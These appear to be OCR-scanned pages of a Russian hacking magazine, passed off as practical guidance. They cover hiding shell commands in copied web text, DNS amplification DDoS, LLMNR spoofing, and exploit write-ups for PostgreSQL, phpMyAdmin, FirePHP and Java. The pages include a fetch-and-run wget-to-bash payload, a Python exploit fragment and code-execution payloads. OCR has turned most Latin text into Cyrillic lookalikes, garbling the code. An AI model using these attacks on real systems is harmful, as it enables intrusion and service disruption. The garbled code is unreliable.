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Рис. 2. Вставил команду с доо.дІ/ЬкктР в консоль 



Возможно, у тебя возник вопрос, почему пэйлоад вставляется в сере- 
дину, а не в начало, например? Это важно, поскольку нам надо быть уве- 
ренными, что юзер скопирует всю строку. А так — что-то может не попасть 
в буфер. Мы же не знаем, откуда начнет выделение строки юзер. 

Хорошо, с тем, «как спрятать», я думаю, все понятно. Далее — шелл- 
команды и попытка спрятать их при вводе в консоли. Первый необходимый 
пункт уже описан — нам надо первую команду нейтрализовать (>/сіеѵ/пиІІ), 
а последнюю сделать аналогичной первой. 

Дальше — заставить команды сработать всем вместе. Если юзер вставит 
в консоль данные строки без их выполнения, он, скорее всего, заметит что- 
то неладное: была одна команда — стало пяток. Поэтому нам необходимо, 
чтобы наша последовательность выполнилась, а на вводе в консоли оста- 
лась только видимая команда. Решение просто — после нашей последова- 
тельности надо вставить символ перевода строки. Но так как мы имеем дело 
с НТМІ_, то вместо перевода строки мы юзаем <Ьг>. 

Следующий пункт — спрятать вывод только что исполненных команд. 
Простейшее решение - сіеаг, которая «очистит» консоль. Ну а сам пэйлоад 
может быть почти любым и зависит от фантазии. Например, дабы не пихать 
все команды в пэйлоад, его можно залить со стороннего хоста — «ѵѵдеі -ц 
ехатріе.сот -0-|Ьаз1і». 

Получается еще одна прикольная техника 1)1 гесігеззіпд. Ясное дело, 
что ее можно доразвить. Кое-какие наработки представлены здесь: ІІіеіігі. 

пеІ/тіас/ѵтеЬзйе-'ЕегтіпаІ-сорѵ-разІіе и аоо.аІ/НзбЦт . Да и кроме терми- 
нала и веб-сайтов идею можно перенести на другие технологии. Здесь важ- 
но лишь воображение. 
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000$ ЧЕРЕЗ 0№, ИЛИ ЧТО ТАКОЕ 0И$ АМРИРІСАТІОИ 



РЕШЕНИЕ 

□N3 — одна из основополагающих технологий всего интернета, а потому 
понимание ее проблем достаточно важная для нас штука. Мы уже познако- 
мились с такой техникой, как сасбе зпооріпд, и с базовыми основами РЫЗ 
два номера назад, так что я не буду расписывать их снова, хотя знания эти 
понадобятся для понимания. 

Тема задачки — модная РЫЗ Атріііісаііоп АЯаск (или Э1М8 ВеЯесІіоп 
аНаск). Эта РОоЗ-атака «модная» потому, что не так давно с ее помощью 
смогли нагенерить сначала 70 Гбит/с против сервиса СІоисіІІаге, а потом 
и 300 Гбит/с против Зратбаизе. Причем от последней атаки проблемы воз- 
никли даже у магистральных провайдеров. Вот с ней мы и познакомимся. 

Но немного истории. Несмотря на свою модность, атака эта известна 
уже очень давно. Теоретические статьи датируются 2000-ми годами {думаю, 
и раньше что-то было), а в 2004-2005-м были обнаружены атаки в 10 Пбит/с. 
Итак, что это за атака. 

В общем, все очень просто. ЭІЧЗ базируется на ІЮР-протоколе, который 
не требует установки соединения (без «рукопожатия») и работает без сохра- 
нения состояния о соединении. Пришел запрос — ответил и забыл. И это 
дает возможность хакеру подменять ІР-адрес отправителя в запросе к ОИЗ- 
серверу на адрес его жертвы. Таким образом ответ от РИЗ приходит жертве. 

Второе свойство ОИЗ, которое эксплуатируется для проведения 
атрІіТісаІіоп -атаки, — разница в размерах запроса и ответа. Стандартный 
ОМЗ-запрос — 60 байт, ответ — байт от 200. Но при определенных махина- 
циях его можно довести до 4400 байт. То есть усиление атаки будет состав- 
лять порядка 80 раз. И это вроде как не предел. 

Конечно, это может выглядеть не столь шокирующе, но это смотря 
как посчитать :}. Представь: если взять небольшой ботнетик и заставить их 
запрашивать у тысяч ста ОМЗ-серверов резол в специально подготовленной 
зоны, то выстоять от такой атаки сможет мало кто. Проблема ведь здесь 
в том, что просто забивается канал до ресурса, то есть ее можно было бы ре- 
шить только на уровне провайдера. Но провайдеры к таким вещам не очень- 
то подготовлены, и заблочить по ІР- адресам (распространенная практика 
защиты) нет возможности: их очень много, да и поменять их — не проблема. 

Так, а что фактически потребуется для проведения такой атаки? Во- 
первых, Э^-сервер {или серверы) со специально подготовленной зоной. 
И чем больший ответ удастся «заложить», тем более мощной получится 
атака. Самый простой способ — использовать ТХТ-запись. Как пишут, в нее 
можно запихнуть до 4000 байт любой фигни. А есть ведь еще много раз- 
ных — АААА, ЗОА, МХ и другие. Плюс к этому новые перспективы видятся 
в 0М35ЕС, который еще больше по размерам... 

О’кей, что дальше? Дальше злоумышленникам необходимо найти РМЗ- 
серверы, которые бы использовались для релея (перенаправления) дан- 
ных от некого контролируемого РЫЗ-сервера на хост жертвы. Такие ОМЗ- 



серверы должны быть определенным образом настроены, чтобы можно 
было их использовать для атаки. Самое главное, чтобы они разрешали про- 
изводить рекурсивные (то есть чтобы сами ходили за РЫЗ-записью, а не на- 
зывали «ближайший» ОЫЗ-сервер) запросы для всех хостов из интернета, 
а не только для внутренних хостов. Уточню последний момент. Вот, напри- 
мер, РЫЗ-сервер твоего провайдера. Если он резолвит рекурсивно только 
по запросам от хостов из подсетки провайдера, то все хорошо для него. 
Если же он производит резолв от любого хоста из интернета, тогда он — то, 
что нам нужно, он — «ореп гезоіѵег». 

Но сколько их необходимо? Чем больше, тем лучше. На стороне пло- 
хих парней есть два больших плюса. По умолчанию, многие ОІЧЗ-серверы 
настроены именно на ореп гезоіѵе. Во-вторых, количество ОМЗ-серверов 
очень велико в Сети. По очень приблизительным данным, еще лет пять на- 
зад 75% всех ОЫЗ-серверов в Сети было настроено на ореп гезоіѵе, и было 
найдено 1,5 миллиона таких хостов. Сейчас ситуация только ухудшилась — 
найдено около 25 миллионов... 

В общем -то — это все. Разве что стоит отметить: чтобы контролируе- 
мый 0143-сервер с большой записью не загибался от множества запросов 
с других ОЫЗ-серверов, следует выбирать серверы с включенной функцией 
кеширования и увеличенным ТТІ_ (временем жизни записи). Таким образом, 
ореп гезоіѵег зайдет один раз за записью, а потом в течение, например, су- 
ток его можно будет использовать для атаки. 

Концепт атаки представлен на рисунке и состоит из следующих общих 
шагов: 

0. Жертва — 10. 10. 1.1, и у атакующего есть небольшой ботнет 

и РЫЗ-сервер Ьаг.<1ІсІ> со специально подготовленными записями. 

1 . Атакующий посылает ботнету призыв к атаке жертвы . 

2. Из ботнета отправляется множественный запрос к множеству 
ОЫЗ-серверов, сконфигуренных на ореп гезоіѵе, на резолв записи 
Тоо с подконтрольного атакующему Ьаг.<Ш>. В запросах 
подменяется ІР-адрес отправителя на адрес жертвы. 

3. Ореп гезоіѵег’ы запрашивают ^оо у Ьаг.<1ІсІ>. 

4. Им возвращается большущий ответ (более 4000 байт на каждый за- 
прос). 

5. Ореп гезоіѵег’ы отправляют этот ответ жертве. 

На картинке жертвой является ОМЗ-сервер, но фактически это не так важно. 

Но иметь ботнет — это иметь ботнет. На самом деле он нам не особо 
и нужен. Это для РВ -акций нужны цифры в гигабиты. В реальной же жизни 
канал связи до 100 Мбит/с. То есть все становится на порядки легче. Конеч- 
но, следует отметить, что и у атакующей стороны КПД не 100% и 80-кратного 
увеличения мощности атаки добиться непросто. Но все же устроить ООоЗ — 
ужа не заоблачная задача :). Увы, это тренд. 



I Хакер приказывает 
ботнету начать атаку 



Атакующий 








Все хосты ботнета отправляют 
ОЫЗ-запросы на ореп гезоіѵе 
□МЗ-сервера для разрешения 
имени «Ьаг.<іІсі>» 3 принадлежа- 
щему хакеру. При этом ІР-адресу 
выставлено значение 10.10.1.1 





Жертва 
ІР: 10.10.1.1 



Ореп гезоіѵе 0МЗ- 
серверы пересылают 
эти большие ответы на 
ІР-адрес жертвы 
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Открытые рекурсивные 
серверы 



Ореп гезоіѵе ОМЗ-серверы 
запрашивают зону у 0МЗ- 
серверахакера 




□ЫЗ-сервераха- 
кера возвращает 
оченьбольшую 
запись в ответ на 
□МЗ-запросы 



Сервер имен 
Ьаг.<Ш> 



□N5 Атріібсаііоп 
АНаск. Общий концепт 
□ОоЗ-атаки 
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ОРГАНИЗОВАТЬ МІТМ, 
ИСПОЛЬЗУЯ ПРОТОКОЛ шш 



РЕШЕНИЕ 

В прошлом номере мы продолжили познавать различные техники организа- 
ции тап-іп-фе-тісісііе атак. И сегодня — новый дуршлаг информации на эту 
тему. Стоит отметить, что если предыдущий метод уже «отживает свое» (ІСМР 
гесіігесі:}, то этот только начинает существование. Но обо всем по порядку. 

І_І_ММН (Упк-ІосаІ МиШсазІ Ыате Незоіиііоп) — это новый протокол от 
МісгозоЙ, который используется для того, чтобы резолвить имена хостов, 
находящихся в той же подсети, что и хост, посылающий пакет. Как говорит 
М$, это может быть очень полезно в сетях, где применение ОМЗ-сервера 
либо неудобно, либо невозможно. Например, во «временных» сетях, типа 
ѴѴі-Рі -точек. 

На самом деле Ц-МЫН — это, по сути, аналог ІМеІВІОЗ Ыате Зегѵісе. Но 
есть пара интересных для нас моментов. Во-первых, это поддержка и ІРѵб, 
и ІРѵ4, что отсутствует в ИеШІОЗ. Во-вторых, это теоретическая поддержка 
длинных имен (более 15 символов, которые ограничивали ИВ N3). В-третьих, 
это совсем другой протокол. Точнее, Ц-МИВ базируется на ЭИЗ-протоколе 
(ЮР и имеет почти такие же пакеты по формату. Но изменен порт — 5355. 
В-четвертых, Ш/ІИВ располагается следом за ОИЗ в общесистемном резол- 
ве имен хостов (файл Мозіз, РЫБ, ІХМИВ, ІЧВ N3). Поддержка ШѴІІЧВ есть 
начиная с висты (более поздние версии также поддерживают ТСР-версию 
протокола). 

Интересно еще, как ИМИВ работает. Ц-МИВ-запросы посылаются на 
специальные групповые адреса (МиШсазІ-асІсІгезз). Для ІРѵ4 это 224.0.0.252 
и МАО — 01 -00-5Е-00-00-РС. Для ІРѵб — РР02::1:3 и МАС — 33-33-00-01-00- 
03. То есть все виндовые хосты мониторят такие пакеты. Если хост в запросе 
находит свое имя, то он уже отвечает на конкретный порт и ІР- адрес хоста, 
запрашивающего имя. 

Хотелось бы еще отметить, что, к сожалению, кеш Ц-МИВ отделен от 
ОЫЗ’овского, так что здесь нам ничего не светит. И ктому же Ц-МЫВ работает 
только для простых имен хостов {то есть если в имени резолвируемого хоста 
отсутствуют точки). 

Так зачем мы можем юзать этот протокол? Как уже было сказано, посколь- 
ку он, по сути, аналог МВ N5, то и сфера его применения аналогична. Про- 
стейшим, но при этом достаточно мощным вектором будет спуфинг поиска 
ѴѴРАЭ другими хостами, то есть «внедрение» своего прокси-сервера в атаку- 
емые ОС. Плюсом же будет поддержка ІРѵб, и к тому же ЫейЗІОЗ в отличие от 
1_1_ММВ иногда отключают. Реализация же самой атаки очень проста. Все, что 
нам понадобится, — это МеШзрІоіІ Ргатеѵѵогк. Запускается модуль и указы- 
вается ІР-адрес для спуфинга: 

изе аихі1іагу/5рооб/11тп г/11 тпг_ге5роп5е 
5еТ 5Р00РІР 192. 168.0 .100 



Дальше разберешься :). 

Ну вот и все. Надеюсь, что было интересно :). Если есть предложения 
по разделу Еазу Наск или желание поресерчить — пиши на ящик. Всегда 
рад :). И успешных познаний нового! ЗГ 
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117 13.192605 192.163.9.100 192,168.0.1 0М5 5*апіатЦ диегу А 
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Ргате 117: 95 Ьутез оп міге (760 Ыіз), 95 Ьутез сартигесі (760 Ысз) 

ЕгНегпеі II, 5гс: НопНаіРг_еО : ЬФЛО (с4 :17Ле:е0:Ь4:^0) , 051:: 0-ііпкіп_4 3: 3^:96 (1с:а^:^7:43:а^:9б) 
ІлТегпеГ. РгоіоссП ѴегзіопА, 5гс: 192.168.0.100 (192 Л68. 0. 100) . Озі; 192,168.0.1 (192.168.0.1) 
иаег оатадгат рготосоЧ . ъгс Рогт : 57686 (57686)* оя рост : йскпаіп (53) 

Сюшаіпі чате ^узіеш (диегу) 

Гйрярснтяе іп: 1241 
тг дпадстіол го: ОхЛ'РЗ 
3 Идда: 0x0100 (БТдпгідггі диегу) 

Оиезтіопг: 1 
Апімег кйз : 0 
АитЬогіТу йДз: 0 
АйсИтіопаІ ДЯ5 : 0 
3 ОиеМез 

а ^ 1111 ^. 11111111111111111 222222, <ПІпк: Туре А т СІД55 ІИ 
чате: ггігігіггііггнгігггггггггігг. еПІпк 
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Ц ІпТегпеТ РгоТосоІ Ѵегаіоп 4, 5гс: 192.168.0.100 (192.168.0.100), 224.0.0.2 52 (224,0,0.2 52) 

Ѳ У5€Г ОаТадгдт РгаТосоІ, 5гс Рост: 63579 (63579), Ост РогТ : Птг (5355) 

О Ті пк-Іосаі Миітісазі Чате Кезоіитіоп (диегу) 

ТгапзасТіоп ІО: 0к84е4 
0 РІадз: 0x0000 (Біагтсіаггі диегу) 

Оиеііійпь: 1 
АЛ5нег ЕЕ5 : 0 
АиТНогІігу НА5 : о 
Асігііііопд] №; О 
В Оуегіе^ 

Е 222222222:22 7.7.2.12.2. гггггд^ 222 гг : туре А, сТалз ІЧ 
ЧДПІС: 22222222222222222222222222222 
Туре: А (но5Т асігігезз) 

СІ а5 5 : ІЧ (0x0001) 



иіІѴІЫР и 0 М 5 — найди отличия 
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іѵакіяшс 

Вся информация предо- 
ставлена исключительно 
в ознакомительных целях. 

Ни редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи. 



Борис Рютин, ЦОР (Езаде ІаЬ) 

сіикеЬагтаіШхакер.ги 

(ЭсМеЬагтап 



Думается, никого не удивить очередной 
уязвимостью Лаѵа. Правда, в этот раз она 
впервые реализована не в эксплойт-па- 
ках, а в Меіазріоіі Так что представите- 
лям темной стороны пришлось изучать 
работу вайтхетов, а не наоборот :). 





ИНЪЕКЦИЯ ЧЕРЕЗ ФЛАГ КОМАНДНОЙ СТРОКИ 
С ИМЕНЕМ БД В Р0$Т0РЕ$(П. 

СѴ55ѵ2: 6.5 (АѴ:М/АС:І-/Аи:3/С:Р/І:Р/А:Р) 

Дата релиза: 4 апреля 2013 года 
Автор: Міізиплаза Копсіо, Куоіаго Ногідисбі 
СѴЕ: 2013-1899 

Начнем с уязвимости в довольно популярной БД Роз!дгѳ50[_ (кстати, она ис- 
пользуется в нашем любимом Меіазріоіі). Уязвимости типа инъекции аргу- 
мента давно не встречались на страницах журнала. Когда пользователь сое- 
диняется с сервером, используя имя базы данных, начинающееся с символа 
«-», Розідгез считает данное имя аргументом командной строки. Это позволя- 
ет неавторизованному атакующему отправить любой из доступных аргумен- 
тов в выполняемый процесс и выполнить его с теми же правами (но только 
один). Аргументы можно узнать из официального руководства: ЬіІ.І ѵ/ гѴу АзР. 

ЕХРІОІТ 

Изначально уязвимость была типа Бо5, но после небольшого исследования 
и доработки ее сделали частично ВСЕ. Это получилось с помощью аргумента 
«-г», который позволяет перенаправить вывод выполнения в файл . Например: 

рзді --ы5 ег пате= | Ч :е5 , Ы23" --Іп оз1:=1 92. 168. 1. 100 -е 

- - б Ьпате= " - г± е5б . оиТ " 



Содержимое файла Іезі. оиі: 

2013-04-08 14:2 4 : 4 5 ЕРТ РАТАЦ : по р§_ЬЬа . сопТ епбгу Тог <-* 

192. 168 .1.100", изег "безбігЗ", сІаІіаЬазе "-гТезІ: .оифГ, 551. оп 



2013-04-08 14:_24:45 ЕРТ Р АТ АЬ : по р§_МЬа,сопТ епТгу -Рог боз1:_е 
"192.168.1.100 ". изег Ч ез1:1 23" . гіаб а Ьазе "-гЬез-Е.оиІ:". 551. оТ-Р 

Как видишь, мы можем задать любое имя пользователя, и оно будет за- 
писано в лог. Но с одним ограничением — длина имени не должна превышать 
63 байта. Помимо этого, любой новый файл, созданный с помощью такой ко- 
манды, будет иметь права доступа 0600, поэтому первая же мысль — создать 
веб-шелл — невыполнима. Также при попытке добавить наши строки в лю- 
бой другой файл мы не получим сообщение об ошибке: «соиісі по! ореп» или 
«Регтіззіоп бепіесі». При желании можно пробрутить имена, но воспользуем- 
ся файлом, который заведомо есть в системе и доступен для записи процессу 
Розідгез, — /ѵаг/ІіЬ/розІдгездІ/.ргабІе (тестировалось на ІЛэипЩ}. 



Пойманный пакет аутентификации с Розідгев-сервером 



► Ргате 2Ѳ: 177 Ъуіеь оп иіге (1416 ЫТ*), 177 Ьуіез саріигесі (1416 Ьііб) 

► ЕіЬегпеІ II, Бгс; : ѲѲ ѲѲтѲѲ:0Ѳ (ѲѲ: ѲѲ : Ѳ0:ѲѲ : 00 : ѲѲ) , ОЫ: 0Ѳ:ѲѲ:ѲѲ ѲѲ:ѲѲ:ѲѲ (ѲѲ: ѲѲ : 00 : ѲѲ: ѲѲ : 00 ) 

► Іпіегпеі Ргоіосоі Ѵегзіоп 4, 5гс: 192.168.2.22 (192.168.2.22), Оз!: 192.168.2.22 (192.168.2.22) 

► Тгапзшіззіоп СопТгоІ Ргоіосоі, 5гс Рог!: 59984 (59984), 051 Рог!: розіідгезді (5412), Бед: 1, Аск: 1, І_с 
РрзІдгеіОІ 

Туре: БТагіир те 5 5 аде 
1.еп-дТ:Іі : 111 

и&ег: АААААААААААААААААААААААААА 
йаІіаЬазе: -ВВВВВВВВВВВВВВВВ 



арріісагюп пате: рзді 



сііепі епсойіпд: (ЛЕВ 
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Обзор эксплойтов 



6з 



Чтобы сделать наш лог выполняемым, нужно перед нашей командой до- 
бавить кавычки, символ новой строки — 0x0а, а затем символ комментария — 
#. В результате получится: 

Е ?5РАТА!_С28000Мпо рі_ЬЬа . согтР еп*гу Тог ІЮ5І: "192.168 Л .20 ". «-■ 
изег "" 

соттапсі #" л сІаТаЬазе "-г/у аг/ НЬ/розТ^ г езд!/ .р гоТІе" . _±± 

551. оТТРаиТб , сЕ483КС1іеп1:Аи1:Ііеп1:іса1:іоп 



Также нам понадобится добавить в отсылаемый пакет: «магическое чис- 
ло», размер, имя приложения, кодировку и завершающий нулевой байт. Та- 
кие данные мы получили с помощью анализа перехваченного пакета аутенти- 
фикации {см. скриншот). Пример такого пакета на Руібоп представлен ниже: 

ЬиТ_ = "\х00\х03\х00\х007Л 

Чізег\х00" \ 

" \”\х0а м + зуз.агеѵГі] + ” #\х00" \ # Имя пользователя 

“ба-ра Ьазе \х00 " V 

"-г" + зуз_. аг§ѵ[2] + "\х00" \ # Имя файла для записи 

"арр1ісаѣіоп_паітіе\хѲѲр5д 1_р ыпіе\х00\хѲѲ" 

ЬиТ - БЕгисТ. раск(" >1" , ІепСЬи-Н+4) + Ь иТ 

зоск ~ зоскеТ. 50скеТ(5оске1: .АР_:ШЕТд 5оскеТ.50СК_5ТКЕАМ) 

5 ос к. соппесф( (Н05Ь РОКТ) ) 

50ск. зепб(ЬиТ) 



Если мы подадим на вход эксплойта следующие данные: 

"/и зг/Ьіп/са!" /ѵаг/ІіЬ/ро зЕ^гез дІ/ . ргоТІе 

то при запуске Розідгез запустится календарь. Результат можно увидеть 
на скриншоте. Готовый эксплойт можно скачать с сайта автора: іІ.Іу/Тб 9ѴО . 

На момент сдачи материала появился модуль для Меіазріоіі: в виде ска- 
нера: ЬІІ.Іѵ/14ЬЗбВі . 

ТАПСЕТ8 

* РозІдгеБОЕЭ. 0.0-9.0.13; 

* Рое{дге501_9.1 .0-9. 1.9; 

* Роз1дгеБОЕ9.2.0-9.2.4. 

80ІЛШОЫ 

Доступно обновление с исправлением данной ошибки от производителя. 

МНОГОЧИСЛЕННЫЕ УЯЗВИМОСТИ 
В РНРМѴАйМШ 3.5.8 И 4.0.0-РС2 

СѴ55ѵ2: 9.0 (АѴ:Р/АС:ІѴАи:ЗІ/С:С/І:С/А:С) 

8.5 (АѴ:П/АС:ІѴІ/Аи:ЗІ/С:С/І:С/А:С) 

6 .5 ( АѴ: И/ АС : І_/Аи :3 1/С: Р/І : Р/А: Р ) 

9.0 (АѴ:П/АС±/Аи:ЗІ/С:С/І:С/А:С) 

Дата релиза: 25 апреля 2013 года 
Автор: Лапек Ѵіпб «ѵѵагахе» 

СѴЕ: 2013-3238, 2013-3239, 2013-3240, 2013-3241 

Любой, кто работал и работает с сайтами, знаком с таким приложением, 
как рбрМуАсІтіп. В этом месяце один из исследователей выпустил бюллетень 
сразу с четырьмя уязвимостями и эксплойтами под них. 

ЕХРЮІТ 

Первая уязвимость позволяет выполнить произвольный код. Это происходит 
из-за недостаточной проверки переменных ^готрге^іх и 1о_ргеЛх, которые 
передаются в функцию ргед геріасе в файле ІіЬгагіеБ/тиІІ зиЬтіІв.іпс.рбр: 

сазе * ге ріас е ргеТх ТЫ 1 : 

$сиггеп1: = $зе!ес1:есі[$і] : 

$пемЕаЫепате = рге§_гер1асе("/ л " . $_Р05Т[ 1 ТготргеТх 1 ] -м 

. 11 / 11 . $ Р05Т [ 1 ТоргеТ х * ] } $ с и г ге пі: ) 

$а_диегу = ’АЬХЕК^ГАВЕЕ ’ . РИА Ш: і1 : :Ьас кдиоТе<~. 

($зе1есТеб[ $і] ) . ’ КЕМАМЕ 1 . РМА ІІЕІ1 : : ЬаскдиоТе< -> 

($пем'ЬаЬ1епате)^ 

$гип_раг±5 = "Ьгие; 



сазе 1 с ору_ 1 : Ы_сНа п^е ргеТіх ' : 
$сиггепі = 5 зе 1 ес 1 :есіІ[$і] : 



гоос@иЪшъи:~# зи - розпдгез 
2013-04-09: соттапсі пос ^оипсі 
Аргіі 2013 

5и Но Іи ТСе ТЬ Ег 5а 
12 3 4 5 6 
7 3 9 10 11 12 13 
14 15 16 17 18 19 20 
21 22 23 24 25 26 27 
23 29 30 

розсдгез@иЬшіШ: 



атакованной машине 



$ пеуфаЬ 1 е пате = рге§_гер1асе("/ л, ‘ • 5_Р05Т[ '-Ггот рге-Ііх 1 ] 

■ . $ _Р05Т[ ' іо рге ііх 1 ] . $сиггеп1: ^ 

$а_диегу = ’СКЕАТЕ ТАВІЕ РМА_У1:І1 :_^Ьаскдио1:е^ 

($пеіЛаЬ1епате) . ' 5ЕкЕСТ * РКОМ ' , РМА_ІІ'Ьі] і і : Ьаскдиоііе^ 
( $ 5 еіе сііесі [ $І1) і 
$гип_раг'Ь5 = 1:гие; 



Эксплуатация возможна при использовании любой программы или пла- 
гина для браузера (РР Татрег, Мосіі^у Неабегз), с помощью которой можно 
модифицировать РОБТ-запросы. Условия для проведения атаки: 

• залогиниться любым РМА- пользователем; 

• версия РНР до 5.4.7 (в новых версиях будет ошибка: 

«ѴѴагпіпд: ргед_герІасе(): ІЧиІ! Ьуіеіп гедех»). 

Проходим по ссылке ИНр:// 5 іІе.сот/РМА/іпсІех.рбр?сІЬ= 1 ез 1 , выбираем 
одну из таблиц из БД, используя сбескЬох. Далее выбираем «Реріасе ШЫе 
ргеііх», где видим два поля ввода. Вот через эти переменные и нужно отпра- 
вить следующие данные, например: 

• Ргопл — 7е%00" 

• То — "рИріп^о()" 

Их можно ввести прямо в эти поля, но тогда перед отправкой на сервер 
нужно перехватить РОЗТ-запрос и изменить значение ”%2Ре%2500”. Нужно 
удалить 25, чтобы стало "%2Ре%00". 

Следующая уязвимость тоже позволяет выполнить произвольный код, 
но уже через сохранение БОЕ-дампа. 

Условия для проведения атаки: 

• залогиниться любым РМА-пользователем; 

- пункт настроек «БаѵеОіг» определен и указывает на директорию, 
доступную для записи с возможностью удаленного запуска 
(по умолчанию переменная БаѵеОіг пуста); 

• на веб-сервере не настроено МІМЕ-расширение ЗОЕ. 

Если все условия соблюдены, то выбираем любую БД и вставляем туда строку: 
< ?рбр рЬріп-Ро О і ?> 

Далее экспортируем эту таблицу с дополнительной опцией: «Сохранить 
на сервер в директорию ./». Выбираем формат БОЕ и в поле «Имя шаблона» 
пишем: 

(ЙЮАТАВА5Е () рЬр 

Получаем ответ от сервера «Дамп сохранен в файл .ДезЕрбр.здІ.». Теперь 
можно обратиться к нашему файлу бПрѴ/зііе.сот/РМАДезЕрІір.здІ, где мы 
увидим вывод функции рбріп^о(). 

Третья по счету уязвимость позволяет читать файлы на сервере. Уязви- 
мость находится в файле ехрогі.рбр. 

РМ А ІДіІ: : с!іескРагагпе^ег 5 (аггау( 1 мЬаІ : ' ехрогЕ_1:уре ' ) ) : 

$ехрогЕ_р1и§іп = РМА_§еЕР1иёіп( 

"ехрогТ" д $мИа1д * Іі Ьгагіез/рІи^іпз/ехрогі:/ ' Л 
аггау ( ' ехрог~Ь_1:уре 1 => фехрогіі^уред 

' зіп^Іе^аЬІе ' => _І5 5е1:($5Іпе1е_ѣаЬ1е) ) 


Как мы видим, параметр \л/ба1 не фильтруется и дальше попадает в функ- 
цию РМА деіРІидіп, где происходит проверка на наличие файла с последую- 
щей вставкой в скрипт. 

ТипсЕіоп РМА_§еЕР1и§іп.( 

$р1иёіп_ѣуред 
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$ р 1 и § і_п_-р о гша ѣ л 
$р_1иёіпз_сІіг л 
$р1и§іп_рагат = Таізе 

)_{ 

БС10ВАІ_5[ ' ріи ці п рагат ' ] _=_ $р1ияіп р агат; 

$с1а55_пате = 5^г1:оиррег($р1и§іп_1:уре[Ѳ]) 

. 5І:г1:о1омег(5иЬ5І:г($ р1 икі п ѣ уре, 1)) 

. 5І:гіоиррег(Бр1и§іп_-Рогта1:[0] ) 

. 5І:гіо1оыег(5иЬ5І:г(Бр1иеігі_Топпа1: , I 1 ) ) : 

БПІе = $с1а55_пате . " . сіазз . ріпр"; 
і-Г (І5_1і1е(Ір1идіп5_сІіг . $1і1е)) { 

іпсіисіе опсе Бр1иеіл5_сІіг . Біііе^ 

Условия для проведения атаки: 

* залогиниться любым РМА-пользователем; 

РНР < 5.3.4, чтобы можно было провести атаку с помощью нулевого байта. 

Также есть еще одно ограничение: в этот раз уязвимы только рГірМуАбт іп 4.x. 

Последняя на сегодня уязвимость (и тоже в файле ехрогІ.рГір) позволяет 
переписать массив $СІ_0ВАІ_8. 

-ГогеасГі (БР05 Т а 5 Бопе_ро5~Ь_рагат => $опе_ро5І_ѵа1ие) { 

$(зЮВАІ.5[$опе_ро5І:_рагапи] = $опе_роз1:_ѵа1ие; 

} 



ЬеасІег("Х-ИТ-Рго1:ос о1-1 : ІѵЬ'Ьр : /7те 1:а . міІсІП геІід . ог§/Рго1:ос о 1/<-і 

ЗдопБ Ігеат/ 0 . 2"); 

Неасіег("Х-ІлГР-1-РІи§іп -1: ІгН:р: //теІіа.ГігерГір, ог^/ІлІіІсИпге/^— < 

Р1и %і п/РігеРНР/1_іЬгагу-РігеРНРСоге/Ѳ. 3") ; 

ЬеасіеііС'Х-ЫТ-І-Бѣгис'Гиге'І : ІгЫ:р: //те1:а .Яг ерИр.огй/ЫіІсКігеЛ- 1 

51:гис1:иге/РігеРНР/Оитр/0 .1") : 

$рау1оас1= "Х- Іл ГР-1-1-1-1: 

Брау1оасІ.= 5І:г1еп( Бехріоіі:) •_!__[ 1 .Бе хріоіі:. " | \г\п" ; 

И е а сі е г ( $ р а у 1 о асі).; 

?> 

<М1:т1><ЬеасІ><1:і'Ые>РігеРНР КСЕ_ РоС< /’Ы'Ыех/ Іпеасі > 

< Ьосіу > РІлІМТІ</ Ьосіу > < / Ифті > 

ТАПСЕТ5 

РігеРНР до версии 0.7. 1 включительно. 

50ШТІ0Ы 

Доступно обновление с исправлением данной ошибки от производителя. 

ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА ЧЕРЕЗ 
ОШИБКУ ТИПОВ В ОРАСЬЕ МА 8Е 



Как видно, все, что передадим через РОЗТ-запрос, может попасть в мас- 
сив $ѲІ_ОВАІ_3 или переписать уже существующий параметр. Один из векто- 
ров атаки — использовать в связке с предыдущей уязвимостью, то есть с по- 
мощью последней изменить параметр ЗаѵеОіг на тот, который нужен нам. 



СѴ55ѵ2: 9.3 (АѴ:Р!/АС:М/Аи:М/С:С/1:С/А:С) 
Дата релиза: 10 января 2013 года 
Автор: Зегоеп РгіЦегз 
СѴЕ: 2013-2423 



ТАПСЕТ5 

• рГірМуАсІтіп3.5.х-3.5.8; 

* рЬрМуАРтіп4.х-4.0.0-гсЗ. 

зоттіом 

Доступно обновление с исправлением данной ошибки от производителя. 

ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОЙ КОМАНДЫ 
В РІРЕРНР РІРЕРОХ РШСІИ 0.7.1 

СѴ$8ѵ2: 9.3 (АѴ:П/АС:М/Аи:М/С:Р/І:С/А:С) 

Дата релиза: 17 апреля 2013 года 
Автор: ѴѴігедГіоиІ 
СѴЕ: М/А 

В этом месяце у нас опять новинка среди «жертв»: уязвимость обнаружена 
в довольно популярном среди программистов Рігеіох- плагине РігеРНР (по- 
могает производить отладку как простых проектов, так и крупных, в том чис- 
ле основанных на известных фреймворках: 2епсІРгате\л/огк, Уіі и так далее). 
Уязвимость возникла из-за отсутствия достаточной проверки полученных 
данных от сервера, что позволяет выполнить произвольный код. Разработ- 
чик плагина довольно оперативно устранил уязвимость, добавив функцию 
езсареНТМЬдля своих переменных. Проект хранится наСіІНиЬ, поэтому весь 
список изменений можно посмотреть по ссылке: ЫіЛу/2Ш8ш. 



Как уже говорилось выше, эта уязвимость в Заѵа отличается тем, что была 
найдена исследователем, поэтому обновления были получены раньше, чем 
она начала эксплуатироваться эксплойт-паками. Кстати, некоторые создате- 
ли таких паков поленились даже изменить названия, в итоге после анализа 
были найдены слова теіазріоіі. 

Ошибка происходит из-за ошибок типов переменных. Так, при измене- 
нии с типа ОоиЬіе.ТѴРЕ на ІпІедег.ТУРЕ, а затем копировании поля іпіедег 
из одного объекта в другой с использованием отражения (геТІесІіоп) ЛЗЕ 
считает, что наше іпіедег-поле на самом деле является боиЫе, и копирует 
8 байт вместо 4. 

ЕХРЮІТ 

Ниже представлена основная часть РоС, отключающего Зесигііу Мападег: 



РоС { 



БІіаіііс ѵо: 


ісі сІізаЬІеБесигі'ГуМапаеегП ІИгоѵ 


*і 5 ТіігоыаЫе { 


Ме1:Ьос1НапсІ1е тНІ. 


т!і2: 




тГіІ = 1оокир( ) .Гіпс(51:а1:іс5е'Ы:ег(0оиЫе. 


1355 ■ "ТУРЕ “ . м 


СІЭ55 . с] 




тН2 = 1оокир( ) .ГіпсІ51:а1:іс5е1:1:ег(Іп1:ейег . сіазз . "ТУРЕ". ^ 


Сіазз . с] 


Іаззі : 


